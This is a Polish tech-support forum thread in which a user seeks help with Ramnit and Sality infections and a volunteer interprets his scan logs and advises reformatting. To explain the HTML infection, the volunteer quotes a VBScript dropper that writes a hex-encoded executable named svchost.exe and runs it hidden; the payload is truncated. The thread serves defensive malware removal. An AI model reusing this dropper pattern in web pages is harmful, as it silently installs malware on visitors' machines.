Skocz do zawartości
WAŻNE - Użytkownicy uprawnieni do pomocy
WAŻNE - Zakładanie tematu: obowiązkowe logi
Nadchodzące zmiany w logowaniu

Ramnit

dragolice

Przez dragolice
w Dział pomocy doraźnej

Rekomendowane odpowiedzi

dragolice

dragolice

Opublikowano
Opublikowano

Siemka.

 

Dwa góra trzy dni temu został podpięty zainfekowany pendrive. W głównym katalogu (na pendrive) tylko fałszywy kosz recycler, który po skasowaniu się odnawia. Podejrzewam że brat odpalił zainfekowany plik exe. Przeskanowałem system antywirusem mbam (szybkie skanowanie). Wykazał on infekcję ramnit. Wcześniej było jeszcze jakieś adware babylon którego się pozbyłem korzystając z programu adwcleaner. W ostatnim czasie system nadział się już na sality, i mam cichą nadzieję że wyniki mbam to tylko resztki tej infekcji. Zauwazyłem, że samoczynnie na starcie odpala się proces iexplore.exe. Myślałem na początku ze Internet Explorer gdzieś się załączył, ale widać tylko proces w menadżerze zadań (zresztą coś poderzanie za mało ramu zżera - 4mb...). Wyskoczył raz komunikat, że pliki systemu windows zostały podmienione (...) wsadź płytę z win xp sp3 itd. Nie wiem o które konkretnie pliki chodzi. Na chwilę obecną płyty nie posiadam, na jutro coś skombinuje jeśli będzie potrzeba. Twardy dysk ciągle coś mieli, po zamknięciu iexplore.exe przestaje. Ehh, znów wszystkie wykonywalne szlak trafi. Przejrzałem log z gmer (zainteresowałem się trochę tematyką usuwania wirusów) i OTL, wnioskuję że nie jest najlepiej (ExplorerSrv.exe) więc proszę o pomoc w ocenie logów i uporaniu się z tym.

Dołączam też log otl który powstał po wykonaniu skryptu (zapewnie nieudolnie) stworzonego przezemnie już po użyciu salitykiller, gdy wdarła się (ta wcześniejsza) infekcja sality.

Dzięki za pomoc.

 

Edit: Zapomniałem o logu z mbam. Już załączony.

AdwCleanerR2.txt

AdwCleanerS2.txt

OTL.Txt

Extras.Txt

gmer.txt

Log z Czyszczenia.txt

mbam-log-2012-11-15 (16-10-14).txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
picasso

picasso

Opublikowano
Opublikowano

dragolice, log z OTL źle zrobiony, opcja Rejestr ustawiona na Wszystko a ma być Użyj filtrowania. Ale nie zajmuj się tym już, bo:

 

 

Przeskanowałem system antywirusem mbam (szybkie skanowanie). Wykazał on infekcję ramnit. (...) W ostatnim czasie system nadział się już na sality, i mam cichą nadzieję że wyniki mbam to tylko resztki tej infekcji. (...) Wyskoczył raz komunikat, że pliki systemu windows zostały podmienione (...) wsadź płytę z win xp sp3 itd. Nie wiem o które konkretnie pliki chodzi. Na chwilę obecną płyty nie posiadam, na jutro coś skombinuje jeśli będzie potrzeba. Twardy dysk ciągle coś mieli, po zamknięciu iexplore.exe przestaje. Ehh, znów wszystkie wykonywalne szlak trafi.

 

Sality a Ramnit to dwie różne infekcje w plikach wykonywalnych. I jest kiepsko. Pliki usuwane przez MBAM na miejsce wróciły:

 

O20 - HKLM Winlogon: UserInit - (c:\program files\microsoft\desktoplayer.exe) - c:\Program Files\Microsoft\DesktopLayer.exe ()
 
[2012-11-15 16:55:24 | 000,023,552 | ---- | M] () -- C:\WINNT\System32\wmimgr32.dll
[2012-11-15 16:55:21 | 000,076,800 | ---- | M] (SOFTWIN S.R.L.) -- C:\WINNT\ExplorerSrv.exe

 

Plik wmimgr32.dll to Sality (KLIK), reszta to Ramnit (KLIK). Pliki wróciły, bo infekcja w wykonywalnych i plikach HTML w toku. MBAM tego nie usunie, on widzi tylko produkty uboczne wirusa (obiekty wtórnie dodane), a nie wirusa w plikach (które trzeba leczyć). Pierwsze symptomy już masz: komunikaty o podmienionych plikach Windows. Tu jest potrzebny antywirus i to najlepiej z poziomu bootowalnej płyty (KLIK), co i tak nie daje gwarancji usunięcia infekcji, ale:

 

Proponuję bez zastanowienia: format. Powody: dwie skrzyżowane kolosalne infekcje w wykonywalnych, już pomijam że adware nadal jest. Moim zdaniem nie warto starać się czyścić, bo wynikowy system i tak nie uzyska pierwotnej sprawności. Jest tu za dużo tego strasznego. Dodatkowy problem to ilość dysków:

 

Drive C: | 48,83 Gb Total Space | 2,74 Gb Free Space | 5,60% Space Free | Partition Type: NTFS
Drive D: | 9,77 Gb Total Space | 6,83 Gb Free Space | 69,96% Space Free | Partition Type: NTFS
Drive E: | 51,39 Gb Total Space | 19,80 Gb Free Space | 38,53% Space Free | Partition Type: NTFS
Drive F: | 48,83 Gb Total Space | 26,68 Gb Free Space | 54,63% Space Free | Partition Type: NTFS
Drive I: | 19,53 Gb Total Space | 4,87 Gb Free Space | 24,93% Space Free | Partition Type: NTFS
Drive J: | 45,23 Gb Total Space | 33,38 Gb Free Space | 73,80% Space Free | Partition Type: NTFS

 

Wirusy w wykonywalnych mają w nosie takie bariery, atakują pliki wykonywalne wszędzie. Format C to może być za mało ...

 

 

 

.

Odnośnik do komentarza
dragolice

dragolice

Opublikowano
  • Autor
Opublikowano

Zdaję sobię sprawę że w takiej sytuacji mbam jest bezradny. Użyłem go żeby tylko wskazał mi trop co do nazwy infekcji i programu którego użyję do jej lecznia. Płyty ze skanerami mam wypalone, jednak z nich nie skorzystam :). Przekonałaś mnie :P. Tak coś czułem żeby już się za to nie zabierać.

Za formatem też przemawia data postawienia systemu (07.05.2005r). Mam pytanie co do plików html, niby logiczne lecz wolę się upewnić :). Czy po otworzeniu pliku w edytorze tekstowym (np. notatnik) i przekopiowaniu treści z pominięciem skryptu i kodu wirusa do nowego pliku, który zapiszę jako txt uchroni mnie przed wirusem?

 

btw. Przepraszam za źle skonfigurowany OTL, zauważyłem to dopiero w trakcie skanowania...

Dzięki za odpowiedź. Temat można zamknąć.

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano
Za formatem też przemawia data postawienia systemu (07.05.2005r).

 

To tym bardziej nie patyczkuj się.

 

 

Czy po otworzeniu pliku w edytorze tekstowym (np. notatnik) i przekopiowaniu treści z pominięciem skryptu i kodu wirusa do nowego pliku, który zapiszę jako txt uchroni mnie przed wirusem?

 

Pliki HTML mają wstawiony skrypt VBS podobny do tego:

 

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000 (...) 00000000000000000000000000000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

 

Otworzenie pliku HTML uruchamia wstawiony do niego skrypt, który upuszcza dodatkową infekcję. Wgląd przez Notatnik (nie przeglądarkę) wydaje się być sensowny, ale nie pokładam w ogóle zaufania w takie metody.

 

 

 

.

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...